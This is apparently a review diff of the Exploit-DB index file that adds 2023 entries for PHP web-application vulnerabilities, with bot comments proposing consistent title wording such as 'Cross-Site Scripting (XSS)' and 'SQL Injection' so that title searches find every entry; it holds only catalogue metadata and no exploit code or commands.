46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip, 46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
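Review bot: Row 51548 shortens the vulnerability class to "Stored XSS", while the context rows 51121 and 46608 spell out "Cross-Site Scripting" in the title. Anyone matching the description column on the long form will not see the 3.4.1 entry. Suggest "Rukovoditel 3.4.1 - Multiple Stored Cross-Site Scripting (XSS)".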
@ -28886,6 +28897,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php,,2008-11-27,2017-01-04,1,OSVDB-57400;CVE-2008-7077,,,,, 7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,webapps,php,,2008-11-27,2017-01-04,1,OSVDB-57400;CVE-2008-7077,,,,,
49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,,2020-12-23,2020-12-23,0,,,,,, 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php,,2020-12-23,2020-12-23,0,,,,,,
46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80,2019-05-14,2019-06-10,0,,"SQL Injection (SQLi)",,,, 46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80,2019-05-14,2019-06-10,0,,"SQL Injection (SQLi)",,,,
51549,exploits/php/webapps/51549.py,"Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)",2023-07-03,"Amirhossein Bahramizadeh",webapps,php,,2023-07-03,2023-07-03,0,CVE-2023-36346,,,,,
51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-19,1,CVE-2023-3184,,,,, 51513,exploits/php/webapps/51513.txt,"Sales Tracker Management System v1.0 - Multiple Vulnerabilities",2023-06-13,"AFFAN AHMED",webapps,php,,2023-06-13,2023-06-19,1,CVE-2023-3184,,,,,
50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",2022-01-13,"Betul Denizler",webapps,php,,2022-01-13,2022-01-13,0,,,,,, 50659,exploits/php/webapps/50659.txt,"SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)",2022-01-13,"Betul Denizler",webapps,php,,2022-01-13,2022-01-13,0,,,,,,
37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php,,2012-08-18,2015-07-19,1,,,,,,https://www.securityfocus.com/bid/55117/info 37642,exploits/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",webapps,php,,2012-08-18,2015-07-19,1,,,,,,https://www.securityfocus.com/bid/55117/info
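Review bot: Row 51549 writes "Cross Site Scripting (XSS)" without the hyphen, unlike the other XSS rows added in this commit (51559, 51563, 51558, 51562), which all use "Cross-Site Scripting (XSS)". A search on the hyphenated form skips this entry. Suggest "Sales of Cashier Goods v1.0 - Cross-Site Scripting (XSS)".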
@ -29974,6 +29986,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80,2016-10-20,2016-10-20,1,CVE-2016-7998,,,,http://www.exploit-db.comSPIP-v3.1.2.zip, 40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80,2016-10-20,2016-10-20,1,CVE-2016-7998,,,,http://www.exploit-db.comSPIP-v3.1.2.zip,
9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php,,2009-08-17,,1,CVE-2009-3041;OSVDB-57510,,,,, 9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php,,2009-08-17,,1,CVE-2009-3041;OSVDB-57510,,,,,
33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80,2014-05-19,2014-05-21,0,CVE-2013-2118;OSVDB-93683,,,,http://www.exploit-db.comSPIP-v3.0.8.zip, 33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",webapps,php,80,2014-05-19,2014-05-21,0,CVE-2013-2118;OSVDB-93683,,,,http://www.exploit-db.comSPIP-v3.0.8.zip,
51557,exploits/php/webapps/51557.txt,"spip v4.1.10 - Spoofing Admin account",2023-07-03,nu11secur1ty,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
51536,exploits/php/webapps/51536.py,"SPIP v4.2.0 - Remote Code Execution (Unauthenticated)",2023-06-20,nuts7,webapps,php,,2023-06-20,2023-06-21,1,CVE-2023-27372,,,,, 51536,exploits/php/webapps/51536.py,"SPIP v4.2.0 - Remote Code Execution (Unauthenticated)",2023-06-20,nuts7,webapps,php,,2023-06-20,2023-06-21,1,CVE-2023-27372,,,,,
10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,, 10408,exploits/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX & Cr3W-DZ",webapps,php,,2009-12-12,,1,,,,,,
34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info 34321,exploits/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",webapps,php,,2010-07-15,2014-08-12,1,,,,,,https://www.securityfocus.com/bid/41701/info
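Review bot: Row 51557 writes the product name in lowercase as "spip", while every neighbouring row (40595, 9448, 33425, 51536) uses "SPIP", so a case-sensitive match on the product name will not return it. The rest of the title also mixes capitalisation ("Spoofing Admin account"). Suggest "SPIP v4.1.10 - Spoofing Admin Account".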
@ -30681,6 +30694,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17239,exploits/php/webapps/17239.txt,"Time and Expense Management System - Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",webapps,php,,2011-05-03,2011-05-03,0,OSVDB-72105;OSVDB-72106;OSVDB-72107,,,,http://www.exploit-db.comtems.zip, 17239,exploits/php/webapps/17239.txt,"Time and Expense Management System - Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",webapps,php,,2011-05-03,2011-05-03,0,OSVDB-72105;OSVDB-72106;OSVDB-72107,,,,http://www.exploit-db.comtems.zip,
45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comtems.zip, 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comtems.zip,
45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comtems.zip, 45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php,,2018-10-17,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comtems.zip,
51558,exploits/php/webapps/51558.txt,"Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
11516,exploits/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,OSVDB-62478;CVE-2010-0707,,,,http://www.exploit-db.comtimeclock-software.zip, 11516,exploits/php/webapps/11516.html,"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)",2010-02-20,ViRuSMaN,webapps,php,,2010-02-19,,1,OSVDB-62478;CVE-2010-0707,,,,http://www.exploit-db.comtimeclock-software.zip,
39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80,2016-02-03,2020-10-14,0,,,,,, 39404,exploits/php/webapps/39404.txt,"TimeClock Software 0.995 - (Authenticated ) Multiple SQL Injections",2016-02-03,Benetrix,webapps,php,80,2016-02-03,2020-10-14,0,,,,,,
48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,,2020-10-14,2020-10-14,0,,,,,, 48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,,2020-10-14,2020-10-14,0,,,,,,
@ -31279,6 +31293,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7061,exploits/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,webapps,php,,2008-11-07,2017-01-02,1,OSVDB-51101;CVE-2008-5785,,,,, 7061,exploits/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,webapps,php,,2008-11-07,2017-01-02,1,OSVDB-51101;CVE-2008-5785,,,,,
7063,exploits/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,webapps,php,,2008-11-07,,1,OSVDB-49675;CVE-2008-5784;CVE-2008-5783,,,,, 7063,exploits/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,webapps,php,,2008-11-07,,1,OSVDB-49675;CVE-2008-5784;CVE-2008-5783,,,,,
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,,2019-02-11,2019-03-16,0,,,,,, 46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - (Authenticated) Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,,2019-02-11,2019-03-16,0,,,,,,
51562,exploits/php/webapps/51562.txt,"Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)",2023-07-03,CraCkEr,webapps,php,,2023-07-03,2023-07-03,0,,,,,,
11410,exploits/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,webapps,php,,2010-02-10,,1,OSVDB-62296;CVE-2010-0763,,,,, 11410,exploits/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,webapps,php,,2010-02-10,,1,OSVDB-62296;CVE-2010-0763,,,,,
6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,, 6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,,
15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,, 15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,,
@ -31868,6 +31883,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,, 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,, 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,, 51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,,
51566,exploits/php/webapps/51566.txt,"WBCE CMS 1.6.1 - Open Redirect & CSRF",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,, 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,, 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,, 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
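Review bot: Row 51566 puts two vulnerability classes in one title and abbreviates the second as "CSRF", whereas other rows in this file spell it out as "Cross-Site Request Forgery" (48347, 45630). Suggest "WBCE CMS 1.6.1 - Open Redirect / Cross-Site Request Forgery (CSRF)" so that a title search on either class finds the entry.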
@ -32160,6 +32176,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz, 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz,
23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,, 51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
51554,exploits/php/webapps/51554.txt,"WebsiteBaker v2.13.3 - Directory Traversal",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
51553,exploits/php/webapps/51553.txt,"WebsiteBaker v2.13.3 - Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info 34541,exploits/php/webapps/34541.txt,"WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection",2010-08-29,MiND,webapps,php,,2010-08-29,2014-09-06,1,,,,,,https://www.securityfocus.com/bid/42842/info
44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,, 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,, 7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php,,2009-01-02,2017-01-11,1,,,,,,
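Review bot: Of the two added rows, 51553 is titled "Stored XSS", while the existing row for the same version directly above it, 51349, uses "Cross-Site Scripting (XSS)". The two WebsiteBaker v2.13.3 XSS entries therefore do not match the same title query. Suggest "WebsiteBaker v2.13.3 - Stored Cross-Site Scripting (XSS)" for 51553. Row 51554 reads fine as is.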
@ -33774,6 +33792,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,, 49657,exploits/php/webapps/49657.txt,"WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection",2021-03-17,securityforeveryone.com,webapps,php,,2021-03-17,2021-03-17,0,,,,,,
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,, 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,, 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,, 51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,, 51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
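Review bot: Row 51560 abbreviates the class to "SQLi" in the title, where the rest of the file writes "SQL Injection" (for example 49657 in this hunk's context, and 48874). The CVE-2022-4297 code is filled in, but a lookup by title on "SQL Injection" will not surface this row. Suggest "WP AutoComplete 1.0.4 - Unauthenticated SQL Injection".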
